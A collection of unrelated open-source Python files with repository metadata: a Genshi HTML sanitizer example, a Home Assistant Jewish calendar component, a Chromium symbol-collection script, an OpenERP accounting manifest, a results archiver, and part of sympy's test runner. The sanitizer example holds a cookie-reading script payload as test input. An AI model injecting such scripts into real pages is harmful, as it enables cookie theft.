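    fragment = HTML('<form><p><input type="text" name="foo"/></p>'
                    '<script>alert(document.cookie)</script></form>',
                    encoding='utf-8')
    # The <script> element is dropped and the text input gains value="bar".
    print(fragment | HTMLSanitizer() | HTMLFormFiller(data={'foo': 'bar'}))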
gpl-2.0
pschmitt/home-assistant
homeassistant/components/jewish_calendar/__init__.py
7
4146
"""The jewish_calendar component.""" import logging import hdate import voluptuous as vol from homeassistant.const import CONF_LATITUDE, CONF_LONGITUDE, CONF_NAME import homeassistant.helpers.config_validation as cv from homeassistant.helpers.discovery import async_load_platform _LOGGER = logging.getLogger(__name__) DOMAIN = "jewish_calendar" SENSOR_TYPES = { "binary": { "issur_melacha_in_effect": ["Issur Melacha in Effect", "mdi:power-plug-off"] }, "data": { "date": ["Date", "mdi:judaism"], "weekly_portion": ["Parshat Hashavua", "mdi:book-open-variant"], "holiday": ["Holiday", "mdi:calendar-star"], "omer_count": ["Day of the Omer", "mdi:counter"], "daf_yomi": ["Daf Yomi", "mdi:book-open-variant"], }, "time": { "first_light": ["Alot Hashachar", "mdi:weather-sunset-up"], "talit": ["Talit and Tefillin", "mdi:calendar-clock"], "gra_end_shma": ['Latest time for Shma Gr"a', "mdi:calendar-clock"], "mga_end_shma": ['Latest time for Shma MG"A', "mdi:calendar-clock"], "gra_end_tfila": ['Latest time for Tefilla MG"A', "mdi:calendar-clock"], "mga_end_tfila": ['Latest time for Tefilla Gr"a', "mdi:calendar-clock"], "big_mincha": ["Mincha Gedola", "mdi:calendar-clock"], "small_mincha": ["Mincha Ketana", "mdi:calendar-clock"], "plag_mincha": ["Plag Hamincha", "mdi:weather-sunset-down"], "sunset": ["Shkia", "mdi:weather-sunset"], "first_stars": ["T'set Hakochavim", "mdi:weather-night"], "upcoming_shabbat_candle_lighting": [ "Upcoming Shabbat Candle Lighting", "mdi:candle", ], "upcoming_shabbat_havdalah": ["Upcoming Shabbat Havdalah", "mdi:weather-night"], "upcoming_candle_lighting": ["Upcoming Candle Lighting", "mdi:candle"], "upcoming_havdalah": ["Upcoming Havdalah", "mdi:weather-night"], }, } CONF_DIASPORA = "diaspora" CONF_LANGUAGE = "language" CONF_CANDLE_LIGHT_MINUTES = "candle_lighting_minutes_before_sunset" CONF_HAVDALAH_OFFSET_MINUTES = "havdalah_minutes_after_sunset" CANDLE_LIGHT_DEFAULT = 18 DEFAULT_NAME = "Jewish Calendar" CONFIG_SCHEMA = vol.Schema( { DOMAIN: vol.Schema( { vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string, vol.Optional(CONF_DIASPORA, default=False): cv.boolean, vol.Inclusive(CONF_LATITUDE, "coordinates"): cv.latitude, vol.Inclusive(CONF_LONGITUDE, "coordinates"): cv.longitude, vol.Optional(CONF_LANGUAGE, default="english"): vol.In( ["hebrew", "english"] ), vol.Optional( CONF_CANDLE_LIGHT_MINUTES, default=CANDLE_LIGHT_DEFAULT ): int, # Default of 0 means use 8.5 degrees / 'three_stars' time. vol.Optional(CONF_HAVDALAH_OFFSET_MINUTES, default=0): int, } ) }, extra=vol.ALLOW_EXTRA, ) async def async_setup(hass, config): """Set up the Jewish Calendar component.""" name = config[DOMAIN][CONF_NAME] language = config[DOMAIN][CONF_LANGUAGE] latitude = config[DOMAIN].get(CONF_LATITUDE, hass.config.latitude) longitude = config[DOMAIN].get(CONF_LONGITUDE, hass.config.longitude) diaspora = config[DOMAIN][CONF_DIASPORA] candle_lighting_offset = config[DOMAIN][CONF_CANDLE_LIGHT_MINUTES] havdalah_offset = config[DOMAIN][CONF_HAVDALAH_OFFSET_MINUTES] location = hdate.Location( latitude=latitude, longitude=longitude, timezone=hass.config.time_zone, diaspora=diaspora, ) hass.data[DOMAIN] = { "location": location, "name": name, "language": language, "candle_lighting_offset": candle_lighting_offset, "havdalah_offset": havdalah_offset, "diaspora": diaspora, } hass.async_create_task(async_load_platform(hass, "sensor", DOMAIN, {}, config)) hass.async_create_task( async_load_platform(hass, "binary_sensor", DOMAIN, {}, config) ) return True
apache-2.0
imply/chuu
tools/find_runtime_symbols/prepare_symbol_info.py
24
8217
#!/usr/bin/env python # Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import hashlib import json import logging import os import re import shutil import subprocess import sys import tempfile from proc_maps import ProcMaps BASE_PATH = os.path.dirname(os.path.abspath(__file__)) REDUCE_DEBUGLINE_PATH = os.path.join(BASE_PATH, 'reduce_debugline.py') LOGGER = logging.getLogger('prepare_symbol_info') def _dump_command_result(command, output_dir_path, basename, suffix): handle_out, filename_out = tempfile.mkstemp( suffix=suffix, prefix=basename + '.', dir=output_dir_path) handle_err, filename_err = tempfile.mkstemp( suffix=suffix + '.err', prefix=basename + '.', dir=output_dir_path) error = False try: subprocess.check_call( command, stdout=handle_out, stderr=handle_err, shell=True) except (OSError, subprocess.CalledProcessError): error = True finally: os.close(handle_err) os.close(handle_out) if os.path.exists(filename_err): if LOGGER.getEffectiveLevel() <= logging.DEBUG: with open(filename_err, 'r') as f: for line in f: LOGGER.debug(line.rstrip()) os.remove(filename_err) if os.path.exists(filename_out) and ( os.path.getsize(filename_out) == 0 or error): os.remove(filename_out) return None if not os.path.exists(filename_out): return None return filename_out def prepare_symbol_info(maps_path, output_dir_path=None, alternative_dirs=None, use_tempdir=False, use_source_file_name=False): """Prepares (collects) symbol information files for find_runtime_symbols. 1) If |output_dir_path| is specified, it tries collecting symbol information files in the given directory |output_dir_path|. 1-a) If |output_dir_path| doesn't exist, create the directory and use it. 1-b) If |output_dir_path| is an empty directory, use it. 1-c) If |output_dir_path| is a directory which has 'files.json', assumes that files are already collected and just ignores it. 1-d) Otherwise, depends on |use_tempdir|. 2) If |output_dir_path| is not specified, it tries to create a new directory depending on 'maps_path'. If it cannot create a new directory, creates a temporary directory depending on |use_tempdir|. If |use_tempdir| is False, returns None. Args: maps_path: A path to a file which contains '/proc/<pid>/maps'. alternative_dirs: A mapping from a directory '/path/on/target' where the target process runs to a directory '/path/on/host' where the script reads the binary. Considered to be used for Android binaries. output_dir_path: A path to a directory where files are prepared. use_tempdir: If True, it creates a temporary directory when it cannot create a new directory. use_source_file_name: If True, it adds reduced result of 'readelf -wL' to find source file names. Returns: A pair of a path to the prepared directory and a boolean representing if it created a temporary directory or not. """ alternative_dirs = alternative_dirs or {} if not output_dir_path: matched = re.match('^(.*)\.maps$', os.path.basename(maps_path)) if matched: output_dir_path = matched.group(1) + '.pre' if not output_dir_path: matched = re.match('^/proc/(.*)/maps$', os.path.realpath(maps_path)) if matched: output_dir_path = matched.group(1) + '.pre' if not output_dir_path: output_dir_path = os.path.basename(maps_path) + '.pre' # TODO(dmikurube): Find another candidate for output_dir_path. used_tempdir = False LOGGER.info('Data for profiling will be collected in "%s".' 
% output_dir_path) if os.path.exists(output_dir_path): if os.path.isdir(output_dir_path) and not os.listdir(output_dir_path): LOGGER.warn('Using an empty existing directory "%s".' % output_dir_path) else: LOGGER.warn('A file or a directory exists at "%s".' % output_dir_path) if os.path.exists(os.path.join(output_dir_path, 'files.json')): LOGGER.warn('Using the existing directory "%s".' % output_dir_path) return output_dir_path, used_tempdir else: if use_tempdir: output_dir_path = tempfile.mkdtemp() used_tempdir = True LOGGER.warn('Using a temporary directory "%s".' % output_dir_path) else: LOGGER.warn('The directory "%s" is not available.' % output_dir_path) return None, used_tempdir else: LOGGER.info('Creating a new directory "%s".' % output_dir_path) try: os.mkdir(output_dir_path) except OSError: LOGGER.warn('A directory "%s" cannot be created.' % output_dir_path) if use_tempdir: output_dir_path = tempfile.mkdtemp() used_tempdir = True LOGGER.warn('Using a temporary directory "%s".' % output_dir_path) else: LOGGER.warn('The directory "%s" is not available.' % output_dir_path) return None, used_tempdir shutil.copyfile(maps_path, os.path.join(output_dir_path, 'maps')) with open(maps_path, mode='r') as f: maps = ProcMaps.load(f) LOGGER.debug('Listing up symbols.') files = {} for entry in maps.iter(ProcMaps.executable): LOGGER.debug(' %016x-%016x +%06x %s' % ( entry.begin, entry.end, entry.offset, entry.name)) binary_path = entry.name for target_path, host_path in alternative_dirs.iteritems(): if entry.name.startswith(target_path): binary_path = entry.name.replace(target_path, host_path, 1) nm_filename = _dump_command_result( 'nm -n --format bsd %s | c++filt' % binary_path, output_dir_path, os.path.basename(binary_path), '.nm') if not nm_filename: continue readelf_e_filename = _dump_command_result( 'readelf -eW %s' % binary_path, output_dir_path, os.path.basename(binary_path), '.readelf-e') if not readelf_e_filename: continue readelf_debug_decodedline_file = None if use_source_file_name: readelf_debug_decodedline_file = _dump_command_result( 'readelf -wL %s | %s' % (binary_path, REDUCE_DEBUGLINE_PATH), output_dir_path, os.path.basename(binary_path), '.readelf-wL') files[entry.name] = {} files[entry.name]['nm'] = { 'file': os.path.basename(nm_filename), 'format': 'bsd', 'mangled': False} files[entry.name]['readelf-e'] = { 'file': os.path.basename(readelf_e_filename)} if readelf_debug_decodedline_file: files[entry.name]['readelf-debug-decodedline-file'] = { 'file': os.path.basename(readelf_debug_decodedline_file)} files[entry.name]['size'] = os.stat(binary_path).st_size with open(binary_path, 'rb') as entry_f: md5 = hashlib.md5() sha1 = hashlib.sha1() chunk = entry_f.read(1024 * 1024) while chunk: md5.update(chunk) sha1.update(chunk) chunk = entry_f.read(1024 * 1024) files[entry.name]['sha1'] = sha1.hexdigest() files[entry.name]['md5'] = md5.hexdigest() with open(os.path.join(output_dir_path, 'files.json'), 'w') as f: json.dump(files, f, indent=2, sort_keys=True) LOGGER.info('Collected symbol information at "%s".' % output_dir_path) return output_dir_path, used_tempdir def main(): if not sys.platform.startswith('linux'): sys.stderr.write('This script work only on Linux.') return 1 LOGGER.setLevel(logging.DEBUG) handler = logging.StreamHandler() handler.setLevel(logging.INFO) formatter = logging.Formatter('%(message)s') handler.setFormatter(formatter) LOGGER.addHandler(handler) # TODO(dmikurube): Specify |alternative_dirs| from command line. 
if len(sys.argv) < 2: sys.stderr.write("""Usage: %s /path/to/maps [/path/to/output_data_dir/] """ % sys.argv[0]) return 1 elif len(sys.argv) == 2: result, _ = prepare_symbol_info(sys.argv[1]) else: result, _ = prepare_symbol_info(sys.argv[1], sys.argv[2]) return not result if __name__ == '__main__': sys.exit(main())
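# ----------------------------------------------------------------------------
# Example invocations (a sketch, not part of the original script; the paths
# below are hypothetical):
#
#   ./prepare_symbol_info.py /path/to/chrome.12345.maps
#   ./prepare_symbol_info.py /path/to/chrome.12345.maps chrome.symbols.pre
#
# The collection step can also be driven from Python:
#
#   prepared_dir, used_tempdir = prepare_symbol_info(
#       '/path/to/chrome.12345.maps', use_tempdir=True)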
bsd-3-clause
hbrunn/OpenUpgrade
addons/l10n_syscohada/__openerp__.py
430
1940
# -*- coding: utf-8 -*-
##############################################################################
#
#    Copyright (C) 2010-2011 BAAMTU SARL (<http://www.baamtu.sn>).
#    contact: [email protected]
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as
#    published by the Free Software Foundation, either version 3 of the
#    License, or (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
    'name' : 'OHADA - Accounting',
    'version' : '1.0',
    'author' : 'Baamtu Senegal',
    'category' : 'Localization/Account Charts',
    'description': """
This module implements the accounting chart for OHADA area.
===========================================================

It allows any company or association to manage its financial accounting.

Countries that use OHADA are the following:
-------------------------------------------
    Benin, Burkina Faso, Cameroon, Central African Republic, Comoros, Congo,
    Ivory Coast, Gabon, Guinea, Guinea Bissau, Equatorial Guinea, Mali, Niger,
    Democratic Republic of Congo, Senegal, Chad, Togo.
    """,
    'website': 'http://www.baamtu.com',
    'depends' : ['account', 'base_vat'],
    'demo' : [],
    'data' : ['l10n_syscohada_data.xml','l10n_syscohada_wizard.xml'],
    'auto_install': False,
    'installable': True
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
alipsgh/tornado
archiver/archiver.py
1
1542
""" The Tornado Framework By Ali Pesaranghader University of Ottawa, Ontario, Canada E-mail: apesaran -at- uottawa -dot- ca / alipsgh -at- gmail -dot- com """ import os import zipfile from os.path import basename class Archiver: """ This class stores results of experiments in .zip files for future reference! """ @staticmethod def archive_single(label, stats, dir_path, name, sub_name): file_path = (dir_path + name + "_" + sub_name).lower() stats_writer = open(file_path + ".txt", 'w') stats_writer.write(label + "\n") stats_writer.write(str(stats) + "\n") stats_writer.close() zipper = zipfile.ZipFile(file_path + ".zip", 'w') zipper.write(file_path + ".txt", compress_type=zipfile.ZIP_DEFLATED, arcname=basename(file_path + ".txt")) zipper.close() os.remove(file_path + ".txt") @staticmethod def archive_multiple(labels, stats, dir_path, name, sub_name): file_path = (dir_path + name + "_" + sub_name).lower() stats_writer = open(file_path + ".txt", 'w') for i in range(0, len(labels)): stats_writer.write(labels[i] + "\n") stats_writer.write(str(stats[i]) + "\n") stats_writer.close() zipper = zipfile.ZipFile(file_path + ".zip", 'w') zipper.write(file_path + ".txt", compress_type=zipfile.ZIP_DEFLATED, arcname=basename(file_path + ".txt")) zipper.close() os.remove(file_path + ".txt")
mit
devs1991/test_edx_docmode
venv/lib/python2.7/site-packages/sympy/utilities/runtests.py
3
46156
""" This is our testing framework. Goals: * it should be compatible with py.test and operate very similarly (or identically) * doesn't require any external dependencies * preferably all the functionality should be in this file only * no magic, just import the test file and execute the test functions, that's it * portable """ import os import sys import inspect import traceback import pdb import re import linecache from fnmatch import fnmatch from timeit import default_timer as clock import doctest as pdoctest # avoid clashing with our doctest() function from doctest import DocTestFinder, DocTestRunner import re as pre import random # Use sys.stdout encoding for ouput. # This was only added to Python's doctest in Python 2.6, so we must duplicate # it here to make utf8 files work in Python 2.5. pdoctest._encoding = getattr(sys.__stdout__, 'encoding', None) or 'utf-8' def _indent(s, indent=4): """ Add the given number of space characters to the beginning of every non-blank line in `s`, and return the result. If the string `s` is Unicode, it is encoded using the stdout encoding and the `backslashreplace` error handler. """ if isinstance(s, unicode): s = s.encode(pdoctest._encoding, 'backslashreplace') # This regexp matches the start of non-blank lines: return re.sub('(?m)^(?!$)', indent*' ', s) pdoctest._indent = _indent def sys_normcase(f): if sys_case_insensitive: return f.lower() return f def convert_to_native_paths(lst): """ Converts a list of '/' separated paths into a list of native (os.sep separated) paths and converts to lowercase if the system is case insensitive. """ newlst = [] for i, rv in enumerate(lst): rv = os.path.join(*rv.split("/")) # on windows the slash after the colon is dropped if sys.platform == "win32": pos = rv.find(':') if pos != -1: if rv[pos+1] != '\\': rv = rv[:pos+1] + '\\' + rv[pos+1:] newlst.append(sys_normcase(rv)) return newlst def get_sympy_dir(): """ Returns the root sympy directory and set the global value indicating whether the system is case sensitive or not. """ global sys_case_insensitive this_file = os.path.abspath(__file__) sympy_dir = os.path.join(os.path.dirname(this_file), "..", "..") sympy_dir = os.path.normpath(sympy_dir) sys_case_insensitive = (os.path.isdir(sympy_dir) and os.path.isdir(sympy_dir.lower()) and os.path.isdir(sympy_dir.upper())) return sys_normcase(sympy_dir) def isgeneratorfunction(object): """ Return true if the object is a user-defined generator function. Generator function objects provides same attributes as functions. See isfunction.__doc__ for attributes listing. Adapted from Python 2.6. """ CO_GENERATOR = 0x20 if (inspect.isfunction(object) or inspect.ismethod(object)) and \ object.func_code.co_flags & CO_GENERATOR: return True return False def setup_pprint(): from sympy import pprint_use_unicode, init_printing # force pprint to be in ascii mode in doctests pprint_use_unicode(False) # hook our nice, hash-stable strprinter init_printing(pretty_print=False) def test(*paths, **kwargs): """ Run all tests in test_*.py files which match any of the given strings in `paths` or all tests if paths=[]. Notes: o if sort=False, tests are run in random order (not default). o paths can be entered in native system format or in unix, forward-slash format. 
Examples: >> import sympy Run all tests: >> sympy.test() Run one file: >> sympy.test("sympy/core/tests/test_basic.py") >> sympy.test("_basic") Run all tests in sympy/functions/ and some particular file: >> sympy.test("sympy/core/tests/test_basic.py", "sympy/functions") Run all tests in sympy/core and sympy/utilities: >> sympy.test("/core", "/util") Run specific test from a file: >> sympy.test("sympy/core/tests/test_basic.py", kw="test_equality") Run the tests with verbose mode on: >> sympy.test(verbose=True) Don't sort the test output: >> sympy.test(sort=False) Turn on post-mortem pdb: >> sympy.test(pdb=True) Turn off colors: >> sympy.test(colors=False) The traceback verboseness can be set to "short" or "no" (default is "short") >> sympy.test(tb='no') """ verbose = kwargs.get("verbose", False) tb = kwargs.get("tb", "short") kw = kwargs.get("kw", "") post_mortem = kwargs.get("pdb", False) colors = kwargs.get("colors", True) sort = kwargs.get("sort", True) seed = kwargs.get("seed", None) if seed is None: seed = random.randrange(100000000) r = PyTestReporter(verbose, tb, colors) t = SymPyTests(r, kw, post_mortem, seed) # Disable warnings for external modules import sympy.external sympy.external.importtools.WARN_OLD_VERSION = False sympy.external.importtools.WARN_NOT_INSTALLED = False test_files = t.get_test_files('sympy') if len(paths) == 0: t._testfiles.extend(test_files) else: paths = convert_to_native_paths(paths) matched = [] for f in test_files: basename = os.path.basename(f) for p in paths: if p in f or fnmatch(basename, p): matched.append(f) break t._testfiles.extend(matched) return t.test(sort=sort) def doctest(*paths, **kwargs): """ Runs doctests in all *py files in the sympy directory which match any of the given strings in `paths` or all tests if paths=[]. Note: o paths can be entered in native system format or in unix, forward-slash format. o files that are on the blacklist can be tested by providing their path; they are only excluded if no paths are given. 
Examples: >> import sympy Run all tests: >> sympy.doctest() Run one file: >> sympy.doctest("sympy/core/basic.py") >> sympy.doctest("polynomial.txt") Run all tests in sympy/functions/ and some particular file: >> sympy.doctest("/functions", "basic.py") Run any file having polynomial in its name, doc/src/modules/polynomial.txt, sympy\functions\special\polynomials.py, and sympy\polys\polynomial.py: >> sympy.doctest("polynomial") """ normal = kwargs.get("normal", False) verbose = kwargs.get("verbose", False) blacklist = kwargs.get("blacklist", []) blacklist.extend([ "doc/src/modules/mpmath", # needs to be fixed upstream "sympy/mpmath", # needs to be fixed upstream "doc/src/modules/plotting.txt", # generates live plots "sympy/plotting", # generates live plots "sympy/utilities/compilef.py", # needs tcc "sympy/utilities/autowrap.py", # needs installed compiler "sympy/galgebra/GA.py", # needs numpy "sympy/galgebra/latex_ex.py", # needs numpy "sympy/conftest.py", # needs py.test "sympy/utilities/benchmarking.py", # needs py.test ]) blacklist = convert_to_native_paths(blacklist) # Disable warnings for external modules import sympy.external sympy.external.importtools.WARN_OLD_VERSION = False sympy.external.importtools.WARN_NOT_INSTALLED = False r = PyTestReporter(verbose) t = SymPyDocTests(r, normal) test_files = t.get_test_files('sympy') not_blacklisted = [f for f in test_files if not any(b in f for b in blacklist)] if len(paths) == 0: t._testfiles.extend(not_blacklisted) else: # take only what was requested...but not blacklisted items # and allow for partial match anywhere or fnmatch of name paths = convert_to_native_paths(paths) matched = [] for f in not_blacklisted: basename = os.path.basename(f) for p in paths: if p in f or fnmatch(basename, p): matched.append(f) break t._testfiles.extend(matched) # run the tests and record the result for this *py portion of the tests if t._testfiles: failed = not t.test() else: failed = False # test *txt files only if we are running python newer than 2.4 if sys.version_info[:2] > (2,4): # N.B. # -------------------------------------------------------------------- # Here we test *.txt files at or below doc/src. Code from these must # be self supporting in terms of imports since there is no importing # of necessary modules by doctest.testfile. If you try to pass *.py # files through this they might fail because they will lack the needed # imports and smarter parsing that can be done with source code. # test_files = t.get_test_files('doc/src', '*.txt', init_only=False) test_files.sort() not_blacklisted = [f for f in test_files if not any(b in f for b in blacklist)] if len(paths) == 0: matched = not_blacklisted else: # Take only what was requested as long as it's not on the blacklist. # Paths were already made native in *py tests so don't repeat here. # There's no chance of having a *py file slip through since we # only have *txt files in test_files. 
matched = [] for f in not_blacklisted: basename = os.path.basename(f) for p in paths: if p in f or fnmatch(basename, p): matched.append(f) break setup_pprint() first_report = True for txt_file in matched: if not os.path.isfile(txt_file): continue old_displayhook = sys.displayhook try: # out = pdoctest.testfile(txt_file, module_relative=False, encoding='utf-8', # optionflags=pdoctest.ELLIPSIS | pdoctest.NORMALIZE_WHITESPACE) out = sympytestfile(txt_file, module_relative=False, encoding='utf-8', optionflags=pdoctest.ELLIPSIS | pdoctest.NORMALIZE_WHITESPACE) finally: # make sure we return to the original displayhook in case some # doctest has changed that sys.displayhook = old_displayhook txtfailed, tested = out if tested: failed = txtfailed or failed if first_report: first_report = False msg = 'txt doctests start' lhead = '='*((80 - len(msg))//2 - 1) rhead = '='*(79 - len(msg) - len(lhead) - 1) print ' '.join([lhead, msg, rhead]) print # use as the id, everything past the first 'sympy' file_id = txt_file[txt_file.find('sympy') + len('sympy') + 1:] print file_id, # get at least the name out so it is know who is being tested wid = 80 - len(file_id) - 1 #update width test_file = '[%s]' % (tested) report = '[%s]' % (txtfailed or 'OK') print ''.join([test_file,' '*(wid-len(test_file)-len(report)), report]) # the doctests for *py will have printed this message already if there was # a failure, so now only print it if there was intervening reporting by # testing the *txt as evidenced by first_report no longer being True. if not first_report and failed: print print("DO *NOT* COMMIT!") return not failed # The Python 2.5 doctest runner uses a tuple, but in 2.6+, it uses a namedtuple # (which doesn't exist in 2.5-) if sys.version_info[:2] > (2,5): from collections import namedtuple SymPyTestResults = namedtuple('TestResults', 'failed attempted') else: SymPyTestResults = lambda a, b: (a, b) def sympytestfile(filename, module_relative=True, name=None, package=None, globs=None, verbose=None, report=True, optionflags=0, extraglobs=None, raise_on_error=False, parser=pdoctest.DocTestParser(), encoding=None): """ Test examples in the given file. Return (#failures, #tests). Optional keyword arg "module_relative" specifies how filenames should be interpreted: - If "module_relative" is True (the default), then "filename" specifies a module-relative path. By default, this path is relative to the calling module's directory; but if the "package" argument is specified, then it is relative to that package. To ensure os-independence, "filename" should use "/" characters to separate path segments, and should not be an absolute path (i.e., it may not begin with "/"). - If "module_relative" is False, then "filename" specifies an os-specific path. The path may be absolute or relative (to the current working directory). Optional keyword arg "name" gives the name of the test; by default use the file's basename. Optional keyword argument "package" is a Python package or the name of a Python package whose directory should be used as the base directory for a module relative filename. If no package is specified, then the calling module's directory is used as the base directory for module relative filenames. It is an error to specify "package" if "module_relative" is False. Optional keyword arg "globs" gives a dict to be used as the globals when executing examples; by default, use {}. A copy of this dict is actually used for each docstring, so that each docstring's examples start with a clean slate. 
Optional keyword arg "extraglobs" gives a dictionary that should be merged into the globals that are used to execute examples. By default, no extra globals are used. Optional keyword arg "verbose" prints lots of stuff if true, prints only failures if false; by default, it's true iff "-v" is in sys.argv. Optional keyword arg "report" prints a summary at the end when true, else prints nothing at the end. In verbose mode, the summary is detailed, else very brief (in fact, empty if all tests passed). Optional keyword arg "optionflags" or's together module constants, and defaults to 0. Possible values (see the docs for details): DONT_ACCEPT_TRUE_FOR_1 DONT_ACCEPT_BLANKLINE NORMALIZE_WHITESPACE ELLIPSIS SKIP IGNORE_EXCEPTION_DETAIL REPORT_UDIFF REPORT_CDIFF REPORT_NDIFF REPORT_ONLY_FIRST_FAILURE Optional keyword arg "raise_on_error" raises an exception on the first unexpected exception or failure. This allows failures to be post-mortem debugged. Optional keyword arg "parser" specifies a DocTestParser (or subclass) that should be used to extract tests from the files. Optional keyword arg "encoding" specifies an encoding that should be used to convert the file to unicode. Advanced tomfoolery: testmod runs methods of a local instance of class doctest.Tester, then merges the results into (or creates) global Tester instance doctest.master. Methods of doctest.master can be called directly too, if you want to do something unusual. Passing report=0 to testmod is especially useful then, to delay displaying a summary. Invoke doctest.master.summarize(verbose) when you're done fiddling. """ if package and not module_relative: raise ValueError("Package may only be specified for module-" "relative paths.") # Relativize the path text, filename = pdoctest._load_testfile(filename, package, module_relative) # If no name was given, then use the file's name. if name is None: name = os.path.basename(filename) # Assemble the globals. if globs is None: globs = {} else: globs = globs.copy() if extraglobs is not None: globs.update(extraglobs) if '__name__' not in globs: globs['__name__'] = '__main__' if raise_on_error: runner = pdoctest.DebugRunner(verbose=verbose, optionflags=optionflags) else: runner = SymPyDocTestRunner(verbose=verbose, optionflags=optionflags) if encoding is not None: text = text.decode(encoding) # Read the file, convert it to a test, and run it. test = parser.get_doctest(text, globs, name, filename, 0) runner.run(test) if report: runner.summarize() if pdoctest.master is None: pdoctest.master = runner else: pdoctest.master.merge(runner) return SymPyTestResults(runner.failures, runner.tries) class SymPyTests(object): def __init__(self, reporter, kw="", post_mortem=False, seed=random.random()): self._post_mortem = post_mortem self._kw = kw self._count = 0 self._root_dir = sympy_dir self._reporter = reporter self._reporter.root_dir(self._root_dir) self._testfiles = [] self._seed = seed def test(self, sort=False): """ Runs the tests returning True if all tests pass, otherwise False. If sort=False run tests in random order. 
""" if sort: self._testfiles.sort() else: from random import shuffle random.seed(self._seed) shuffle(self._testfiles) self._reporter.start(self._seed) for f in self._testfiles: try: self.test_file(f) except KeyboardInterrupt: print " interrupted by user" break return self._reporter.finish() def test_file(self, filename): name = "test%d" % self._count name = os.path.splitext(os.path.basename(filename))[0] self._count += 1 gl = {'__file__':filename} random.seed(self._seed) try: execfile(filename, gl) except (ImportError, SyntaxError): self._reporter.import_error(filename, sys.exc_info()) return pytestfile = "" if "XFAIL" in gl: pytestfile = inspect.getsourcefile(gl["XFAIL"]) disabled = gl.get("disabled", False) if disabled: funcs = [] else: # we need to filter only those functions that begin with 'test_' # that are defined in the testing file or in the file where # is defined the XFAIL decorator funcs = [gl[f] for f in gl.keys() if f.startswith("test_") and (inspect.isfunction(gl[f]) or inspect.ismethod(gl[f])) and (inspect.getsourcefile(gl[f]) == filename or inspect.getsourcefile(gl[f]) == pytestfile)] # Sorting of XFAILed functions isn't fixed yet :-( funcs.sort(key=lambda x: inspect.getsourcelines(x)[1]) i = 0 while i < len(funcs): if isgeneratorfunction(funcs[i]): # some tests can be generators, that return the actual # test functions. We unpack it below: f = funcs.pop(i) for fg in f(): func = fg[0] args = fg[1:] fgw = lambda: func(*args) funcs.insert(i, fgw) i += 1 else: i += 1 # drop functions that are not selected with the keyword expression: funcs = [x for x in funcs if self.matches(x)] if not funcs: return self._reporter.entering_filename(filename, len(funcs)) for f in funcs: self._reporter.entering_test(f) try: f() except KeyboardInterrupt: raise except: t, v, tr = sys.exc_info() if t is AssertionError: self._reporter.test_fail((t, v, tr)) if self._post_mortem: pdb.post_mortem(tr) elif t.__name__ == "Skipped": self._reporter.test_skip(v) elif t.__name__ == "XFail": self._reporter.test_xfail() elif t.__name__ == "XPass": self._reporter.test_xpass(v) else: self._reporter.test_exception((t, v, tr)) if self._post_mortem: pdb.post_mortem(tr) else: self._reporter.test_pass() self._reporter.leaving_filename() def matches(self, x): """ Does the keyword expression self._kw match "x"? Returns True/False. Always returns True if self._kw is "". """ if self._kw == "": return True return x.__name__.find(self._kw) != -1 def get_test_files(self, dir, pat = 'test_*.py'): """ Returns the list of test_*.py (default) files at or below directory `dir` relative to the sympy home directory. """ dir = os.path.join(self._root_dir, convert_to_native_paths([dir])[0]) g = [] for path, folders, files in os.walk(dir): g.extend([os.path.join(path, f) for f in files if fnmatch(f, pat)]) return [sys_normcase(gi) for gi in g] class SymPyDocTests(object): def __init__(self, reporter, normal): self._count = 0 self._root_dir = sympy_dir self._reporter = reporter self._reporter.root_dir(self._root_dir) self._normal = normal self._testfiles = [] def test(self): """ Runs the tests and returns True if all tests pass, otherwise False. 
""" self._reporter.start() for f in self._testfiles: try: self.test_file(f) except KeyboardInterrupt: print " interrupted by user" break return self._reporter.finish() def test_file(self, filename): import unittest from StringIO import StringIO rel_name = filename[len(self._root_dir)+1:] module = rel_name.replace(os.sep, '.')[:-3] setup_pprint() try: module = pdoctest._normalize_module(module) tests = SymPyDocTestFinder().find(module) except: self._reporter.import_error(filename, sys.exc_info()) return tests = [test for test in tests if len(test.examples) > 0] # By default (except for python 2.4 in which it was broken) tests # are sorted by alphabetical order by function name. We sort by line number # so one can edit the file sequentially from bottom to top...HOWEVER # if there are decorated functions, their line numbers will be too large # and for now one must just search for these by text and function name. tests.sort(key=lambda x: -x.lineno) if not tests: return self._reporter.entering_filename(filename, len(tests)) for test in tests: assert len(test.examples) != 0 runner = SymPyDocTestRunner(optionflags=pdoctest.ELLIPSIS | \ pdoctest.NORMALIZE_WHITESPACE) old = sys.stdout new = StringIO() sys.stdout = new # If the testing is normal, the doctests get importing magic to # provide the global namespace. If not normal (the default) then # then must run on their own; all imports must be explicit within # a function's docstring. Once imported that import will be # available to the rest of the tests in a given function's # docstring (unless clear_globs=True below). if not self._normal: test.globs = {} # if this is uncommented then all the test would get is what # comes by default with a "from sympy import *" #exec('from sympy import *') in test.globs try: f, t = runner.run(test, out=new.write, clear_globs=False) finally: sys.stdout = old if f > 0: self._reporter.doctest_fail(test.name, new.getvalue()) else: self._reporter.test_pass() self._reporter.leaving_filename() def get_test_files(self, dir, pat='*.py', init_only=True): """ Returns the list of *py files (default) from which docstrings will be tested which are at or below directory `dir`. By default, only those that have an __init__.py in their parent directory and do not start with `test_` will be included. """ def importable(x): """ Checks if given pathname x is an importable module by checking for __init__.py file. Returns True/False. Currently we only test if the __init__.py file exists in the directory with the file "x" (in theory we should also test all the parent dirs). """ init_py = os.path.join(os.path.dirname(x), "__init__.py") return os.path.exists(init_py) dir = os.path.join(self._root_dir, convert_to_native_paths([dir])[0]) g = [] for path, folders, files in os.walk(dir): g.extend([os.path.join(path, f) for f in files if not f.startswith('test_') and fnmatch(f, pat)]) if init_only: # skip files that are not importable (i.e. missing __init__.py) g = [x for x in g if importable(x)] return [sys_normcase(gi) for gi in g] class SymPyDocTestFinder(DocTestFinder): """ A class used to extract the DocTests that are relevant to a given object, from its docstring and the docstrings of its contained objects. Doctests can currently be extracted from the following object types: modules, functions, classes, methods, staticmethods, 